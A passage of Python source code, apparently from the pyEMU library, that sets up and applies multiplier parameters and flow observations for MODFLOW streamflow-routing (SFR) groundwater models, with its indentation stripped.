df = pd.read_csv(sft_file, skiprows=1, delim_whitespace=True) # ,nrows=10000000)
df.columns = [c.lower().replace("-", "_") for c in df.columns]
df = df.loc[df.time.apply(lambda x: x in times), :]
# print(df.dtypes)
# normalize
for c in df.columns:
# print(c)
if not "node" in c:
df.loc[:, c] = df.loc[:, c].apply(try_cast)
# print(df.loc[df.loc[:,c].apply(lambda x : type(x) == str),:])
if df.dtypes[c] == float:
df.loc[df.loc[:, c] < 1e-30, c] = 0.0
df.loc[df.loc[:, c] > 1e30, c] = 1.0e30
df.loc[:, "sfr_node"] = df.sfr_node.apply(np.int)
df.to_csv(sft_file + ".processed", sep=" ", index=False)
return df
def setup_sfr_seg_parameters(
nam_file, model_ws=".", par_cols=None, tie_hcond=True, include_temporal_pars=None
):
"""Setup multiplier parameters for SFR segment data.
Args:
nam_file (`str`): MODFLOw name file. DIS, BAS, and SFR must be
available as pathed in the nam_file. Optionally, `nam_file` can be
an existing `flopy.modflow.Modflow`.
model_ws (`str`): model workspace for flopy to load the MODFLOW model from
par_cols ([`str`]): a list of segment data entires to parameterize
tie_hcond (`bool`): flag to use same mult par for hcond1 and hcond2 for a
given segment. Default is `True`.
include_temporal_pars ([`str`]): list of spatially-global multipliers to set up for
each stress period. Default is None
Returns:
**pandas.DataFrame**: a dataframe with useful parameter setup information
Note:
This function handles the standard input case, not all the cryptic SFR options. Loads the
dis, bas, and sfr files with flopy using model_ws.
This is the companion function to `gw_utils.apply_sfr_seg_parameters()` .
The number (and numbering) of segment data entries must consistent across
all stress periods.
Writes `nam_file` +"_backup_.sfr" as the backup of the original sfr file
Skips values = 0.0 since multipliers don't work for these
"""
try:
import flopy
except Exception as e:
return
if par_cols is None:
par_cols = ["flow", "runoff", "hcond1", "pptsw"]
if tie_hcond:
if "hcond1" not in par_cols or "hcond2" not in par_cols:
tie_hcond = False
if isinstance(nam_file, flopy.modflow.mf.Modflow) and nam_file.sfr is not None:
m = nam_file
nam_file = m.namefile
model_ws = m.model_ws
else:
# load MODFLOW model # is this needed? could we just pass the model if it has already been read in?
m = flopy.modflow.Modflow.load(
nam_file, load_only=["sfr"], model_ws=model_ws, check=False, forgive=False
)
if include_temporal_pars:
if include_temporal_pars is True:
tmp_par_cols = {col: range(m.dis.nper) for col in par_cols}
elif isinstance(include_temporal_pars, str):
tmp_par_cols = {include_temporal_pars: range(m.dis.nper)}
elif isinstance(include_temporal_pars, list):
tmp_par_cols = {col: range(m.dis.nper) for col in include_temporal_pars}
elif isinstance(include_temporal_pars, dict):
tmp_par_cols = include_temporal_pars
include_temporal_pars = True
else:
tmp_par_cols = {}
include_temporal_pars = False
# make backup copy of sfr file
shutil.copy(
os.path.join(model_ws, m.sfr.file_name[0]),
os.path.join(model_ws, nam_file + "_backup_.sfr"),
)
# get the segment data (dict)
segment_data = m.sfr.segment_data
shape = segment_data[list(segment_data.keys())[0]].shape
# check
for kper, seg_data in m.sfr.segment_data.items():
assert (
seg_data.shape == shape
), "cannot use: seg data must have the same number of entires for all kpers"
seg_data_col_order = list(seg_data.dtype.names)
# convert segment_data dictionary to multi index df - this could get ugly
reform = {
(k, c): segment_data[k][c]
for k in segment_data.keys()
for c in segment_data[k].dtype.names
}
seg_data_all_kper = pd.DataFrame.from_dict(reform)
seg_data_all_kper.columns.names = ["kper", "col"]
# extract the first seg data kper to a dataframe
seg_data = seg_data_all_kper[0].copy() # pd.DataFrame.from_records(seg_data)
# make sure all par cols are found and search of any data in kpers
missing = []
cols = par_cols.copy()
for par_col in set(par_cols + list(tmp_par_cols.keys())):
if par_col not in seg_data.columns:
if par_col in cols:
missing.append(cols.pop(cols.index(par_col)))
if par_col in tmp_par_cols.keys():
_ = tmp_par_cols.pop(par_col)
# look across all kper in multiindex df to check for values entry - fill with absmax should capture entries
else:
seg_data.loc[:, par_col] = (
seg_data_all_kper.loc[:, (slice(None), par_col)]
.abs()
.max(level=1, axis=1)
)
if len(missing) > 0:
warnings.warn(
"the following par_cols were not found in segment data: {0}".format(
",".join(missing)
),
PyemuWarning,
)
if len(missing) >= len(par_cols):
warnings.warn(
"None of the passed par_cols ({0}) were found in segment data.".format(
",".join(par_cols)
),
PyemuWarning,
)
seg_data = seg_data[seg_data_col_order] # reset column orders to inital
seg_data_org = seg_data.copy()
seg_data.to_csv(os.path.join(model_ws, "sfr_seg_pars.dat"), sep=",")
# the data cols not to parameterize
# better than a column indexer as pandas can change column orders
idx_cols = ["nseg", "icalc", "outseg", "iupseg", "iprior", "nstrpts"]
notpar_cols = [c for c in seg_data.columns if c not in cols + idx_cols]
# process par cols
tpl_str, pvals = [], []
if include_temporal_pars:
tmp_pnames, tmp_tpl_str = [], []
tmp_df = pd.DataFrame(
data={c: 1.0 for c in tmp_par_cols.keys()},
index=list(m.sfr.segment_data.keys()),
)
tmp_df.sort_index(inplace=True)
tmp_df.to_csv(os.path.join(model_ws, "sfr_seg_temporal_pars.dat"))
for par_col in set(cols + list(tmp_par_cols.keys())):
print(par_col)
prefix = par_col
if tie_hcond and par_col == "hcond2":
prefix = "hcond1"
if seg_data.loc[:, par_col].sum() == 0.0:
print("all zeros for {0}...skipping...".format(par_col))
# seg_data.loc[:,par_col] = 1
# all zero so no need to set up
if par_col in cols:
# - add to notpar
notpar_cols.append(cols.pop(cols.index(par_col)))
if par_col in tmp_par_cols.keys():
_ = tmp_par_cols.pop(par_col)
if par_col in cols:
seg_data.loc[:, par_col] = seg_data.apply(
lambda x: "~ {0}_{1:04d} ~".format(prefix, int(x.nseg))
if float(x[par_col]) != 0.0
else "1.0",
axis=1,
)
org_vals = seg_data_org.loc[seg_data_org.loc[:, par_col] != 0.0, par_col]
pnames = seg_data.loc[org_vals.index, par_col]
pvals.extend(list(org_vals.values))
tpl_str.extend(list(pnames.values))
if par_col in tmp_par_cols.keys():
parnme = tmp_df.index.map(
lambda x: "{0}_{1:04d}_tmp".format(par_col, int(x))
if x in tmp_par_cols[par_col]
else 1.0
)
sel = parnme != 1.0
tmp_df.loc[sel, par_col] = parnme[sel].map(lambda x: "~ {0} ~".format(x))
tmp_tpl_str.extend(list(tmp_df.loc[sel, par_col].values))
tmp_pnames.extend(list(parnme[sel].values))
pnames = [t.replace("~", "").strip() for t in tpl_str]
df = pd.DataFrame(
{"parnme": pnames, "org_value": pvals, "tpl_str": tpl_str}, index=pnames
)
df.drop_duplicates(inplace=True)
if df.empty:
warnings.warn(
"No spatial sfr segment parameters have been set up, "
"either none of {0} were found or all were zero.".format(
",".join(par_cols)
),
PyemuWarning,
)
# return df
# set not par cols to 1.0
seg_data.loc[:, notpar_cols] = "1.0"
# write the template file
_write_df_tpl(os.path.join(model_ws, "sfr_seg_pars.dat.tpl"), seg_data, sep=",")
# make sure the tpl file exists and has the same num of pars
parnme = parse_tpl_file(os.path.join(model_ws, "sfr_seg_pars.dat.tpl"))
assert len(parnme) == df.shape[0]
# set some useful par info
df["pargp"] = df.parnme.apply(lambda x: x.split("_")[0])
if include_temporal_pars:
_write_df_tpl(
filename=os.path.join(model_ws, "sfr_seg_temporal_pars.dat.tpl"), df=tmp_df
)
pargp = [pname.split("_")[0] + "_tmp" for pname in tmp_pnames]
tmp_df = pd.DataFrame(
data={"parnme": tmp_pnames, "pargp": pargp}, index=tmp_pnames
)
if not tmp_df.empty:
tmp_df.loc[:, "org_value"] = 1.0
tmp_df.loc[:, "tpl_str"] = tmp_tpl_str
df = df.append(tmp_df[df.columns])
if df.empty:
warnings.warn(
"No sfr segment parameters have been set up, "
"either none of {0} were found or all were zero.".format(
",".join(set(par_cols + list(tmp_par_cols.keys())))
),
PyemuWarning,
)
return df
# write the config file used by apply_sfr_pars()
with open(os.path.join(model_ws, "sfr_seg_pars.config"), "w") as f:
f.write("nam_file {0}\n".format(nam_file))
f.write("model_ws {0}\n".format(model_ws))
f.write("mult_file sfr_seg_pars.dat\n")
f.write("sfr_filename {0}\n".format(m.sfr.file_name[0]))
if include_temporal_pars:
f.write("time_mult_file sfr_seg_temporal_pars.dat\n")
# set some useful par info
df.loc[:, "parubnd"] = 1.25
df.loc[:, "parlbnd"] = 0.75
hpars = df.loc[df.pargp.apply(lambda x: x.startswith("hcond")), "parnme"]
df.loc[hpars, "parubnd"] = 100.0
df.loc[hpars, "parlbnd"] = 0.01
return df
def setup_sfr_reach_parameters(nam_file, model_ws=".", par_cols=["strhc1"]):
"""Setup multiplier paramters for reach data, when reachinput option is specififed in sfr.
Args:
nam_file (`str`): MODFLOw name file. DIS, BAS, and SFR must be
available as pathed in the nam_file. Optionally, `nam_file` can be
an existing `flopy.modflow.Modflow`.
model_ws (`str`): model workspace for flopy to load the MODFLOW model from
par_cols ([`str`]): a list of segment data entires to parameterize
tie_hcond (`bool`): flag to use same mult par for hcond1 and hcond2 for a
given segment. Default is `True`.
include_temporal_pars ([`str`]): list of spatially-global multipliers to set up for
each stress period. Default is None
Returns:
**pandas.DataFrame**: a dataframe with useful parameter setup information
Note:
Similar to `gw_utils.setup_sfr_seg_parameters()`, method will apply params to sfr reachdata
Can load the dis, bas, and sfr files with flopy using model_ws. Or can pass a model object
(SFR loading can be slow)
This is the companion function of `gw_utils.apply_sfr_reach_parameters()`
Skips values = 0.0 since multipliers don't work for these
"""
try:
import flopy
except Exception as e:
return
if par_cols is None:
par_cols = ["strhc1"]
if isinstance(nam_file, flopy.modflow.mf.Modflow) and nam_file.sfr is not None:
# flopy MODFLOW model has been passed and has SFR loaded
m = nam_file
nam_file = m.namefile
model_ws = m.model_ws
else:
# if model has not been passed or SFR not loaded # load MODFLOW model
m = flopy.modflow.Modflow.load(
nam_file, load_only=["sfr"], model_ws=model_ws, check=False, forgive=False
)
# get reachdata as dataframe
reach_data = pd.DataFrame.from_records(m.sfr.reach_data)
# write inital reach_data as csv
reach_data_orig = reach_data.copy()
reach_data.to_csv(os.path.join(m.model_ws, "sfr_reach_pars.dat"), sep=",")
# generate template file with pars in par_cols
# process par cols
tpl_str, pvals = [], []
# par_cols=["strhc1"]
idx_cols = ["node", "k", "i", "j", "iseg", "ireach", "reachID", "outreach"]
# the data cols not to parameterize
notpar_cols = [c for c in reach_data.columns if c not in par_cols + idx_cols]
# make sure all par cols are found and search of any data in kpers
missing = []
cols = par_cols.copy()
for par_col in par_cols:
if par_col not in reach_data.columns:
missing.append(par_col)
cols.remove(par_col)
if len(missing) > 0:
warnings.warn(
"the following par_cols were not found in reach data: {0}".format(
",".join(missing)
),
PyemuWarning,
)
if len(missing) >= len(par_cols):
warnings.warn(
"None of the passed par_cols ({0}) were found in reach data.".format(
",".join(par_cols)
),
PyemuWarning,
)
for par_col in cols:
if par_col == "strhc1":
prefix = "strk" # shorten par
else:
prefix = par_col
reach_data.loc[:, par_col] = reach_data.apply(
lambda x: "~ {0}_{1:04d} ~".format(prefix, int(x.reachID))
if float(x[par_col]) != 0.0
else "1.0",
axis=1,
)
org_vals = reach_data_orig.loc[reach_data_orig.loc[:, par_col] != 0.0, par_col]
pnames = reach_data.loc[org_vals.index, par_col]
pvals.extend(list(org_vals.values))
tpl_str.extend(list(pnames.values))
pnames = [t.replace("~", "").strip() for t in tpl_str]
df = pd.DataFrame(
{"parnme": pnames, "org_value": pvals, "tpl_str": tpl_str}, index=pnames
)
df.drop_duplicates(inplace=True)
if df.empty:
warnings.warn(
"No sfr reach parameters have been set up, either none of {0} were found or all were zero.".format(
",".join(par_cols)
),
PyemuWarning,
)
else:
# set not par cols to 1.0
reach_data.loc[:, notpar_cols] = "1.0"
# write the template file
_write_df_tpl(
os.path.join(model_ws, "sfr_reach_pars.dat.tpl"), reach_data, sep=","
)
# write the config file used by apply_sfr_pars()
with open(os.path.join(model_ws, "sfr_reach_pars.config"), "w") as f:
f.write("nam_file {0}\n".format(nam_file))
f.write("model_ws {0}\n".format(model_ws))
f.write("mult_file sfr_reach_pars.dat\n")
f.write("sfr_filename {0}".format(m.sfr.file_name[0]))
# make sure the tpl file exists and has the same num of pars
parnme = parse_tpl_file(os.path.join(model_ws, "sfr_reach_pars.dat.tpl"))
assert len(parnme) == df.shape[0]
# set some useful par info
df.loc[:, "pargp"] = df.parnme.apply(lambda x: x.split("_")[0])
df.loc[:, "parubnd"] = 1.25
df.loc[:, "parlbnd"] = 0.75
hpars = df.loc[df.pargp.apply(lambda x: x.startswith("strk")), "parnme"]
df.loc[hpars, "parubnd"] = 100.0
df.loc[hpars, "parlbnd"] = 0.01
return df
def apply_sfr_seg_parameters(seg_pars=True, reach_pars=False):
"""apply the SFR segement multiplier parameters.
Args:
seg_pars (`bool`, optional): flag to apply segment-based parameters.
Default is True
reach_pars (`bool`, optional): flag to apply reach-based parameters.
Default is False
Returns:
**flopy.modflow.ModflowSfr**: the modified SFR package instance
Note:
Expects "sfr_seg_pars.config" to exist
Expects `nam_file` +"_backup_.sfr" to exist
"""
if not seg_pars and not reach_pars:
raise Exception(
"gw_utils.apply_sfr_pars() error: both seg_pars and reach_pars are False"
)
# if seg_pars and reach_pars:
# raise Exception("gw_utils.apply_sfr_pars() error: both seg_pars and reach_pars are True")
import flopy
bak_sfr_file, pars = None, None
if seg_pars:
assert os.path.exists("sfr_seg_pars.config")
with open("sfr_seg_pars.config", "r") as f:
pars = {}
for line in f:
line = line.strip().split()
pars[line[0]] = line[1]
bak_sfr_file = pars["nam_file"] + "_backup_.sfr"
# m = flopy.modflow.Modflow.load(pars["nam_file"],model_ws=pars["model_ws"],load_only=["sfr"],check=False)
m = flopy.modflow.Modflow.load(pars["nam_file"], load_only=[], check=False)
sfr = flopy.modflow.ModflowSfr2.load(os.path.join(bak_sfr_file), m)
sfrfile = pars["sfr_filename"]
mlt_df = pd.read_csv(pars["mult_file"], delim_whitespace=False, index_col=0)
# time_mlt_df = None
# if "time_mult_file" in pars:
# time_mult_file = pars["time_mult_file"]
# time_mlt_df = pd.read_csv(pars["time_mult_file"], delim_whitespace=False,index_col=0)
idx_cols = ["nseg", "icalc", "outseg", "iupseg", "iprior", "nstrpts"]
present_cols = [c for c in idx_cols if c in mlt_df.columns]
mlt_cols = mlt_df.columns.drop(present_cols)
for key, val in m.sfr.segment_data.items():
df = pd.DataFrame.from_records(val)
df.loc[:, mlt_cols] *= mlt_df.loc[:, mlt_cols]
val = df.to_records(index=False)
sfr.segment_data[key] = val
if reach_pars:
assert os.path.exists("sfr_reach_pars.config")
with open("sfr_reach_pars.config", "r") as f:
r_pars = {}
for line in f:
line = line.strip().split()
r_pars[line[0]] = line[1]
if bak_sfr_file is None: # will be the case is seg_pars is false
bak_sfr_file = r_pars["nam_file"] + "_backup_.sfr"
# m = flopy.modflow.Modflow.load(pars["nam_file"],model_ws=pars["model_ws"],load_only=["sfr"],check=False)
m = flopy.modflow.Modflow.load(
r_pars["nam_file"], load_only=[], check=False
)
sfr = flopy.modflow.ModflowSfr2.load(os.path.join(bak_sfr_file), m)
sfrfile = r_pars["sfr_filename"]
r_mlt_df = pd.read_csv(r_pars["mult_file"], sep=",", index_col=0)
r_idx_cols = ["node", "k", "i", "j", "iseg", "ireach", "reachID", "outreach"]
r_mlt_cols = r_mlt_df.columns.drop(r_idx_cols)
r_df = pd.DataFrame.from_records(m.sfr.reach_data)
r_df.loc[:, r_mlt_cols] *= r_mlt_df.loc[:, r_mlt_cols]
sfr.reach_data = r_df.to_records(index=False)
# m.remove_package("sfr")
if pars is not None and "time_mult_file" in pars:
time_mult_file = pars["time_mult_file"]
time_mlt_df = pd.read_csv(time_mult_file, delim_whitespace=False, index_col=0)
for kper, sdata in m.sfr.segment_data.items():
assert kper in time_mlt_df.index, (
"gw_utils.apply_sfr_seg_parameters() error: kper "
+ "{0} not in time_mlt_df index".format(kper)
)
for col in time_mlt_df.columns:
sdata[col] *= time_mlt_df.loc[kper, col]
sfr.write_file(filename=sfrfile)
return sfr
def apply_sfr_parameters(seg_pars=True, reach_pars=False):
"""thin wrapper around `gw_utils.apply_sfr_seg_parameters()`
Args:
seg_pars (`bool`, optional): flag to apply segment-based parameters.
Default is True
reach_pars (`bool`, optional): flag to apply reach-based parameters.
Default is False
Returns:
**flopy.modflow.ModflowSfr**: the modified SFR package instance
Note:
Expects "sfr_seg_pars.config" to exist
Expects `nam_file` +"_backup_.sfr" to exist
"""
sfr = apply_sfr_seg_parameters(seg_pars=seg_pars, reach_pars=reach_pars)
return sfr
def setup_sfr_obs(
sfr_out_file, seg_group_dict=None, ins_file=None, model=None, include_path=False
):
"""setup observations using the sfr ASCII output file. Setups
the ability to aggregate flows for groups of segments. Applies
only flow to aquier and flow out.
Args:
sft_out_file (`str`): the name and path to an existing SFR output file
seg_group_dict (`dict`): a dictionary of SFR segements to aggregate together for a single obs.
the key value in the dict is the base observation name. If None, all segments
are used as individual observations. Default is None
model (`flopy.mbase`): a flopy model. If passed, the observation names will have
the datetime of the observation appended to them. If None, the observation names
will have the stress period appended to them. Default is None.
include_path (`bool`): flag to prepend sfr_out_file path to sfr_obs.config. Useful for setting up
process in separate directory for where python is running.
Returns:
**pandas.DataFrame**: dataframe of observation name, simulated value and group.
Note:
This is the companion function of `gw_utils.apply_sfr_obs()`.
This function writes "sfr_obs.config" which must be kept in the dir where
"gw_utils.apply_sfr_obs()" is being called during the forward run
"""
sfr_dict = load_sfr_out(sfr_out_file)
kpers = list(sfr_dict.keys())
kpers.sort()
if seg_group_dict is None:
seg_group_dict = {"seg{0:04d}".format(s): s for s in sfr_dict[kpers[0]].segment}
else:
warnings.warn(
"Flow out (flout) of grouped segments will be aggregated... ", PyemuWarning
)
sfr_segs = set(sfr_dict[list(sfr_dict.keys())[0]].segment)
keys = ["sfr_out_file"]
if include_path:
values = [os.path.split(sfr_out_file)[-1]]
else:
values = [sfr_out_file]
for oname, segs in seg_group_dict.items():
if np.isscalar(segs):
segs_set = {segs}
segs = [segs]
else:
segs_set = set(segs)
diff = segs_set.difference(sfr_segs)
if len(diff) > 0:
raise Exception(
"the following segs listed with oname {0} where not found: {1}".format(
oname, ",".join([str(s) for s in diff])
)
)
for seg in segs:
keys.append(oname)
values.append(seg)
df_key = pd.DataFrame({"obs_base": keys, "segment": values})
if include_path:
pth = os.path.join(*[p for p in os.path.split(sfr_out_file)[:-1]])
config_file = os.path.join(pth, "sfr_obs.config")
else:
config_file = "sfr_obs.config"
print("writing 'sfr_obs.config' to {0}".format(config_file))
df_key.to_csv(config_file)
bd = "."
if include_path:
bd = os.getcwd()
os.chdir(pth)
try:
df = apply_sfr_obs()
except Exception as e:
os.chdir(bd)
raise Exception("error in apply_sfr_obs(): {0}".format(str(e)))
os.chdir(bd)
if model is not None:
dts = (
pd.to_datetime(model.start_datetime)
+ pd.to_timedelta(np.cumsum(model.dis.perlen.array), unit="d")
).date
df.loc[:, "datetime"] = df.kper.apply(lambda x: dts[x])
df.loc[:, "time_str"] = df.datetime.apply(lambda x: x.strftime("%Y%m%d"))
else:
df.loc[:, "time_str"] = df.kper.apply(lambda x: "{0:04d}".format(x))
df.loc[:, "flaqx_obsnme"] = df.apply(
lambda x: "{0}_{1}_{2}".format("fa", x.obs_base, x.time_str), axis=1
)
df.loc[:, "flout_obsnme"] = df.apply(
lambda x: "{0}_{1}_{2}".format("fo", x.obs_base, x.time_str), axis=1
)
if ins_file is None:
ins_file = sfr_out_file + ".processed.ins"
with open(ins_file, "w") as f:
f.write("pif ~\nl1\n")
for fla, flo in zip(df.flaqx_obsnme, df.flout_obsnme):
f.write("l1 w w !{0}! !{1}!\n".format(fla, flo))
df = None
pth = os.path.split(ins_file)[:-1]
pth = os.path.join(*pth)
if pth == "":
pth = "."
bd = os.getcwd()
os.chdir(pth)
df = try_process_output_file(
os.path.split(ins_file)[-1], os.path.split(sfr_out_file + ".processed")[-1]
)
os.chdir(bd)
if df is not None:
df.loc[:, "obsnme"] = df.index.values
df.loc[:, "obgnme"] = df.obsnme.apply(
lambda x: "flaqx" if x.startswith("fa") else "flout"
)
return df
def apply_sfr_obs():
"""apply the sfr observation process
Args:
None
Returns:
**pandas.DataFrame**: a dataframe of aggregrated sfr segment aquifer and outflow
Note:
This is the companion function of `gw_utils.setup_sfr_obs()`.
Requires `sfr_obs.config`.
Writes `sfr_out_file`+".processed", where `sfr_out_file` is defined in "sfr_obs.config"
"""
assert os.path.exists("sfr_obs.config")
df_key = pd.read_csv("sfr_obs.config", index_col=0)
assert df_key.iloc[0, 0] == "sfr_out_file", df_key.iloc[0, :]
sfr_out_file = df_key.iloc[0, 1]
df_key = df_key.iloc[1:, :]
df_key.loc[:, "segment"] = df_key.segment.apply(np.int)
df_key.index = df_key.segment
seg_group_dict = df_key.groupby(df_key.obs_base).groups
sfr_kper = load_sfr_out(sfr_out_file)
kpers = list(sfr_kper.keys())
kpers.sort()
# results = {o:[] for o in seg_group_dict.keys()}
results = []
for kper in kpers:
df = sfr_kper[kper]
for obs_base, segs in seg_group_dict.items():
agg = df.loc[
segs.values, :
].sum() # still agg flout where seg groups are passed!
# print(obs_base,agg)
results.append([kper, obs_base, agg["flaqx"], agg["flout"]])
df = pd.DataFrame(data=results, columns=["kper", "obs_base", "flaqx", "flout"])
df.sort_values(by=["kper", "obs_base"], inplace=True)
df.to_csv(sfr_out_file + ".processed", sep=" ", index=False)
return df
def load_sfr_out(sfr_out_file, selection=None):
"""load an ASCII SFR output file into a dictionary of kper: dataframes.
Args:
sfr_out_file (`str`): SFR ASCII output file
selection (`pandas.DataFrame`): a dataframe of `reach` and `segment` pairs to
load. If `None`, all reach-segment pairs are loaded. Default is `None`.
Returns:
**dict**: dictionary of {kper:`pandas.DataFrame`} of SFR output.
Note:
Aggregates flow to aquifer for segments and returns and flow out at
downstream end of segment.
"""
assert os.path.exists(sfr_out_file), "couldn't find sfr out file {0}".format(
sfr_out_file
)
tag = " stream listing"
lcount = 0
sfr_dict = {}
if selection is None:
pass
elif isinstance(selection, str):
assert (
selection == "all"
), "If string passed as selection only 'all' allowed: " "{}".format(selection)
else:
assert isinstance(
selection, pd.DataFrame
), "'selection needs to be pandas Dataframe. " "Type {} passed.".format(
type(selection)
)
assert np.all(
[sr in selection.columns for sr in ["segment", "reach"]]
), "Either 'segment' or 'reach' not in selection columns"
with open(sfr_out_file) as f:
while True:
line = f.readline().lower()
lcount += 1
if line == "":
break
if line.startswith(tag):
raw = line.strip().split()
kper = int(raw[3]) - 1
kstp = int(raw[5]) - 1
[f.readline() for _ in range(4)] # skip to where the data starts
lcount += 4
dlines = []
while True:
dline = f.readline()
lcount += 1
if dline.strip() == "":
break
draw = dline.strip().split()
dlines.append(draw)
df = pd.DataFrame(data=np.array(dlines)).iloc[:, [3, 4, 6, 7]]
df.columns = ["segment", "reach", "flaqx", "flout"]
df["segment"] = df.segment.astype(np.int)
df["reach"] = df.reach.astype(np.int)
df["flaqx"] = df.flaqx.astype(np.float)
df["flout"] = df.flout.astype(np.float)
df.index = [
"{0:03d}_{1:03d}".format(s, r)
for s, r in np.array([df.segment.values, df.reach.values]).T
]
# df.index = df.apply(
# lambda x: "{0:03d}_{1:03d}".format(
# int(x.segment), int(x.reach)), axis=1)
if selection is None: # setup for all segs, aggregate
gp = df.groupby(df.segment)
bot_reaches = (
gp[["reach"]]
.max()
.apply(
lambda x: "{0:03d}_{1:03d}".format(
int(x.name), int(x.reach)
),
axis=1,
)
)
# only sum distributed output # take flow out of seg
df2 = pd.DataFrame(
{
"flaqx": gp.flaqx.sum(),
"flout": df.loc[bot_reaches, "flout"].values,
},
index=gp.groups.keys(),
)
# df = df.groupby(df.segment).sum()
df2["segment"] = df2.index
elif isinstance(selection, str) and selection == "all":
df2 = df
else:
seg_reach_id = selection.apply(
lambda x: "{0:03d}_{1:03d}".format(
int(x.segment), int(x.reach)
),
axis=1,
).values
for sr in seg_reach_id:
if sr not in df.index:
s, r = [x.lstrip("0") for x in sr.split("_")]
warnings.warn(
"Requested segment reach pair ({0},{1}) "
"is not in sfr output. Dropping...".format(
int(r), int(s)
),
PyemuWarning,
)
seg_reach_id = np.delete(
seg_reach_id, np.where(seg_reach_id == sr), axis=0
)
df2 = df.loc[seg_reach_id].copy()
if kper in sfr_dict.keys():
print(
"multiple entries found for kper {0}, "
"replacing...".format(kper)
)
sfr_dict[kper] = df2
return sfr_dict
def setup_sfr_reach_obs(
sfr_out_file, seg_reach=None, ins_file=None, model=None, include_path=False
):
"""setup observations using the sfr ASCII output file. Setups
sfr point observations using segment and reach numbers.
Args:
sft_out_file (`str`): the path and name of an existing SFR output file
seg_reach (varies): a dict, or list of SFR [segment,reach] pairs identifying
locations of interest. If `dict`, the key value in the dict is the base
observation name. If None, all reaches are used as individual observations.
Default is None - THIS MAY SET UP A LOT OF OBS!
model (`flopy.mbase`): a flopy model. If passed, the observation names will
have the datetime of the observation appended to them. If None, the
observation names will have the stress period appended to them. Default is None.
include_path (`bool`): a flag to prepend sfr_out_file path to sfr_obs.config. Useful
for setting up process in separate directory for where python is running.
Returns:
`pd.DataFrame`: a dataframe of observation names, values, and groups
Note:
This is the companion function of `gw_utils.apply_sfr_reach_obs()`.
This function writes "sfr_reach_obs.config" which must be kept in the dir where
"apply_sfr_reach_obs()" is being called during the forward run
"""
if seg_reach is None:
warnings.warn("Obs will be set up for every reach", PyemuWarning)
seg_reach = "all"
elif isinstance(seg_reach, list) or isinstance(seg_reach, np.ndarray):
if np.ndim(seg_reach) == 1:
seg_reach = [seg_reach]
assert (
np.shape(seg_reach)[1] == 2
), "varible seg_reach expected shape (n,2), received {0}".format(
np.shape(seg_reach)
)
seg_reach = pd.DataFrame(seg_reach, columns=["segment", "reach"])
seg_reach.index = seg_reach.apply(
lambda x: "s{0:03d}r{1:03d}".format(int(x.segment), int(x.reach)), axis=1
)
elif isinstance(seg_reach, dict):
seg_reach = pd.DataFrame.from_dict(
seg_reach, orient="index", columns=["segment", "reach"]
)
else:
assert isinstance(
seg_reach, pd.DataFrame
), "'selection needs to be pandas Dataframe. Type {} passed.".format(
type(seg_reach)
)
assert np.all(
[sr in seg_reach.columns for sr in ["segment", "reach"]]
), "Either 'segment' or 'reach' not in selection columns"
sfr_dict = load_sfr_out(sfr_out_file, selection=seg_reach)
kpers = list(sfr_dict.keys())
kpers.sort()
if isinstance(seg_reach, str) and seg_reach == "all":
seg_reach = sfr_dict[kpers[0]][["segment", "reach"]]
seg_reach.index = seg_reach.apply(
lambda x: "s{0:03d}r{1:03d}".format(int(x.segment), int(x.reach)), axis=1
)
keys = ["sfr_out_file"]
if include_path:
values = [os.path.split(sfr_out_file)[-1]]
else:
values = [sfr_out_file]
diff = seg_reach.loc[
seg_reach.apply(
lambda x: "{0:03d}_{1:03d}".format(int(x.segment), int(x.reach))
not in sfr_dict[list(sfr_dict.keys())[0]].index,
axis=1,
)
]
if len(diff) > 0:
for ob in diff.itertuples():
warnings.warn(
"segs,reach pair listed with onames {0} was not found: {1}".format(
ob.Index, "({},{})".format(ob.segment, ob.reach)
),
PyemuWarning,
)
seg_reach = seg_reach.drop(diff.index)
seg_reach["obs_base"] = seg_reach.index
df_key = pd.DataFrame({"obs_base": keys, "segment": 0, "reach": values})
df_key = pd.concat([df_key, seg_reach], sort=True).reset_index(drop=True)
if include_path:
pth = os.path.join(*[p for p in os.path.split(sfr_out_file)[:-1]])
config_file = os.path.join(pth, "sfr_reach_obs.config")
else:
config_file = "sfr_reach_obs.config"
print("writing 'sfr_reach_obs.config' to {0}".format(config_file))
df_key.to_csv(config_file)
bd = "."
if include_path:
bd = os.getcwd()
os.chdir(pth)
try:
df = apply_sfr_reach_obs()
except Exception as e:
os.chdir(bd)
raise Exception("error in apply_sfr_reach_obs(): {0}".format(str(e)))
os.chdir(bd)
if model is not None:
dts = (
pd.to_datetime(model.start_datetime)
+ pd.to_timedelta(np.cumsum(model.dis.perlen.array), unit="d")
).date
df.loc[:, "datetime"] = df.kper.apply(lambda x: dts[x])
df.loc[:, "time_str"] = df.datetime.apply(lambda x: x.strftime("%Y%m%d"))
else:
df.loc[:, "time_str"] = df.kper.apply(lambda x: "{0:04d}".format(x))
df.loc[:, "flaqx_obsnme"] = df.apply(
lambda x: "{0}_{1}_{2}".format("fa", x.obs_base, x.time_str), axis=1
)
df.loc[:, "flout_obsnme"] = df.apply(
lambda x: "{0}_{1}_{2}".format("fo", x.obs_base, x.time_str), axis=1
)
if ins_file is None:
ins_file = sfr_out_file + ".reach_processed.ins"
with open(ins_file, "w") as f:
f.write("pif ~\nl1\n")
for fla, flo in zip(df.flaqx_obsnme, df.flout_obsnme):
f.write("l1 w w !{0}! !{1}!\n".format(fla, flo))
df = None
pth = os.path.split(ins_file)[:-1]
pth = os.path.join(*pth)
if pth == "":
pth = "."
bd = os.getcwd()
os.chdir(pth)
try:
df = try_process_output_file(
os.path.split(ins_file)[-1], os.path.split(sfr_out_file + ".processed")[-1]
)
except Exception as e:
pass
os.chdir(bd)
if df is not None:
df.loc[:, "obsnme"] = df.index.values
df.loc[:, "obgnme"] = df.obsnme.apply(
lambda x: "flaqx" if x.startswith("fa") else "flout"
)
return df
def apply_sfr_reach_obs():
"""apply the sfr reach observation process.
Returns:
`pd.DataFrame`: a dataframe of sfr aquifer and outflow ad segment,reach locations
Note:
This is the companion function of `gw_utils.setup_sfr_reach_obs()`.
Requires sfr_reach_obs.config.
Writes <sfr_out_file>.processed, where <sfr_out_file> is defined in
"sfr_reach_obs.config"
"""
assert os.path.exists("sfr_reach_obs.config")
df_key = pd.read_csv("sfr_reach_obs.config", index_col=0)
assert df_key.iloc[0, 0] == "sfr_out_file", df_key.iloc[0, :]
sfr_out_file = df_key.iloc[0].reach
df_key = df_key.iloc[1:, :].copy()
df_key.loc[:, "segment"] = df_key.segment.apply(np.int)
df_key.loc[:, "reach"] = df_key.reach.apply(np.int)
df_key = df_key.set_index("obs_base")
sfr_kper = load_sfr_out(sfr_out_file, df_key)
